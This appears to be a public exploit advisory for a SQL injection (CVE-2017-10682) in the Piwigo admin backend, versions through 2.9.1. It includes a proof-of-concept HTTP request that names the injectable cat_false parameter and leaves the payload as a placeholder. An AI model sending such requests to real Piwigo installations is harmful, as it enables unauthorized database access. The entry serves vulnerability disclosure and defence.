40 lines
No EOL
1.2 KiB
Text
40 lines
No EOL
1.2 KiB
Text
# # # # #
|
|
# Exploit Title: Piwigo <= 2.9.1 - 'cat_true'/'cat_false' SQL Injection
|
|
# Dork: N/A
|
|
# Date: 12.12.2017
|
|
# Vendor Homepage: http://piwigo.org/
|
|
# Software Link: http://piwigo.org/basics/downloads
|
|
# Version: <= 2.9.1
|
|
# Category: Webapps
|
|
# Tested on: WiN7_x64/WIN10_X64
|
|
# CVE: CVE-2017-10682
|
|
# # # # #
|
|
# Exploit Author: Akityo
|
|
# Email: akityo@foxmail.com
|
|
# # # # #
|
|
# Description:
|
|
#
|
|
# SQL injection vulnerability in the administrative backend in Piwigo through 2.9.1 allows remote users to execute arbitrary SQL commands via the cat_false or cat_true parameter
|
|
# in the comments or status page to cat_options.php.
|
|
#
|
|
#
|
|
# # # # #
|
|
# Proof-of-Concent:
|
|
#
|
|
# POST /[path]/admin.php?page=cat_options§ion=status HTTP/1.1
|
|
# Host: www.test.com
|
|
# Content-Length: 34
|
|
# Cache-Control: max-age=0
|
|
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
|
# Upgrade-Insecure-Requests: 1
|
|
# User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
|
|
# Content-Type: application/x-www-form-urlencoded
|
|
# Accept-Encoding: gzip, deflate
|
|
# Accept-Language: zh-CN,zh;q=0.8
|
|
# Cookie: null
|
|
# Connection: close
|
|
#
|
|
# cat_false%5B%5D=[payload here]&trueify=%C2%AB
|
|
#
|
|
#
|
|
# # # # # |